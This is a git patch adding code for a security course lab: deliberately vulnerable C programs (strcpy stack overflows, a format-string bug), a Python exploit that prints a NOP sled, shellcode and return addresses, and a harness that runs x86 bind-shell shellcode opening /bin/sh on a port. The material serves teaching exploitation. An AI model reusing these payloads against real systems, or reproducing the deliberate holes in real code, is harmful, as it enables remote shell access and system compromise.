From 7a13228c69249393c5a379f65e3ab66b11d2acc4 Mon Sep 17 00:00:00 2001
From: Florian Hoss <mail@florianhoss.de>
Date: Mon, 25 Apr 2022 09:07:50 +0200
Subject: [PATCH] include lab code

---
 Lab02/LabExploitation/bufferOverflow.c      | 71 +++++++++++++++++++++
 Lab02/LabExploitation/bufferOverflowShell.c | 13 ++++
 Lab02/LabExploitation/exploit.py            |  3 +
 Lab02/LabExploitation/formatString.c        | 39 +++++++++++
 Lab02/LabExploitation/test-shellcode.c      | 20 ++++++
 5 files changed, 146 insertions(+)
 create mode 100755 Lab02/LabExploitation/bufferOverflow.c
 create mode 100755 Lab02/LabExploitation/bufferOverflowShell.c
 create mode 100755 Lab02/LabExploitation/exploit.py
 create mode 100755 Lab02/LabExploitation/formatString.c
 create mode 100755 Lab02/LabExploitation/test-shellcode.c

diff --git a/Lab02/LabExploitation/bufferOverflow.c b/Lab02/LabExploitation/bufferOverflow.c
new file mode 100755
index 0000000..eb20d29
--- /dev/null
+++ b/Lab02/LabExploitation/bufferOverflow.c
@@ -0,0 +1,71 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+#include <string.h>
+
+int counter = 0;
+char username[16];
+
+void win() {
+	printf("You win this round %s\n", username);
+	counter++;
+}
+
+void loose() {
+	printf("You lose, better luck next time %s!\n\n", username);
+	counter = 0;
+}
+
+
+int calculate(char *text, int input1, int input2, int input3, int number1, int number2, int number3){
+	
+	char name[16];
+	strcpy(name, text);
+
+	if (number1 == input1 && number2 == input2 && number3 == input3)
+		return 0;
+	else
+		return 1;
+
+}
+
+int main(int argc, char ** argv) {
+
+	int number1, number2, number3;
+	int input1 = 0, input2 = 0, input3 = 0;
+	
+
+	printf("Please enter your name!\n");
+	fgets(username, sizeof(username), stdin);
+
+	
+	while(counter<5){
+	printf("Can you beat this minigame?\n\nEnter three numbers between 0-10 if you guess all correct you win, otherwise you lose!\n");
+	
+	printf("Enter your first guess!\n");
+	scanf("%d", &input1, sizeof(number1));
+	printf("Enter your second guess!\n");
+	scanf("%d", &input2, sizeof(number2));
+	printf("Enter your third guess!\n");
+	scanf("%d", &input3, sizeof(number3));
+
+	srand((unsigned int)time);
+
+	number1 = rand() % 10;
+	number2 = rand() % 10;
+	number3 = rand() % 10;
+
+
+	if(calculate(argv[1], input1, input2, input3, number1, number2, number3)==0)
+		win();
+	else{
+		loose();
+		}
+	
+	}
+
+	printf("Against all odds you beat the game!\nCongratulation %s", username);
+	
+	exit(0);
+	return 0;
+}
diff --git a/Lab02/LabExploitation/bufferOverflowShell.c b/Lab02/LabExploitation/bufferOverflowShell.c
new file mode 100755
index 0000000..47441ee
--- /dev/null
+++ b/Lab02/LabExploitation/bufferOverflowShell.c
@@ -0,0 +1,13 @@
+#include <stdio.h>
+#include <string.h>
+
+int doSomething(char* input){
+	char buf[512];
+	strcpy(buf, input);
+	printf("Copied the following input to the buffer:\n %s\n", buf);
+}
+
+int main(int argc, char *argv[]){
+	doSomething(argv[1]);
+	return 0;
+}
diff --git a/Lab02/LabExploitation/exploit.py b/Lab02/LabExploitation/exploit.py
new file mode 100755
index 0000000..7002234
--- /dev/null
+++ b/Lab02/LabExploitation/exploit.py
@@ -0,0 +1,3 @@
+import struct
+
+print("\x90"*238 +'\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80'+ '\xc0\xf4\xff\xbf'*5)
diff --git a/Lab02/LabExploitation/formatString.c b/Lab02/LabExploitation/formatString.c
new file mode 100755
index 0000000..3abdba2
--- /dev/null
+++ b/Lab02/LabExploitation/formatString.c
@@ -0,0 +1,39 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+
+
+int main() {
+
+    srand (time(NULL)); 
+
+    char firstName [32];
+    unsigned int userInput = 0;    
+    unsigned int key =  random() %65536;
+ 
+    char lastName[16];
+    
+    printf("Please enter your first name!\n");
+    fgets(firstName, sizeof(firstName), stdin);
+
+    printf("Please enter your last name!\n");	
+    fgets(lastName, sizeof(lastName), stdin);
+
+    printf("Your name is:");
+    printf(lastName);
+    printf("\n");
+
+
+    printf("Try to guess the secret number %s\n", &firstName);
+
+    scanf("%d", &userInput);
+	printf("%d\n", userInput);
+
+    if(userInput==key)
+        printf("Format String exploitation is really cool %s\n", &firstName);
+    else
+        printf("Try again!\n");
+
+    return 0;
+
+}
diff --git a/Lab02/LabExploitation/test-shellcode.c b/Lab02/LabExploitation/test-shellcode.c
new file mode 100755
index 0000000..6500f87
--- /dev/null
+++ b/Lab02/LabExploitation/test-shellcode.c
@@ -0,0 +1,20 @@
+#include<stdio.h>
+#include<string.h>
+
+// Enter your shellcode here
+char *code = \
+"\x31\xc0\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xb0\x66"
+"\xcd\x80\x89\xc6\x52\x66\x68\xaa\xaa\x66\x6a\x02\x89\xe1\x6a\x10"
+"\x51\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x52\x56\x89\xe1\xb3\x04"
+"\xb0\x66\xcd\x80\x52\x52\x56\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89"
+"\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x52\x68\x2f"
+"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x52\x89\xe1\xb0\x0b"
+"\xcd\x80\x31\xc0\xb0\x01\xb3\x08\xcd\x80";     
+
+// Just execute the shellcode. This is just to check if your shellcode works
+int main(int argc,char** argv ){
+        printf("Shellcode Length:  %lu\n", strlen(code));
+        int (*ret)() = (int(*)())code;
+        ret();
+}
+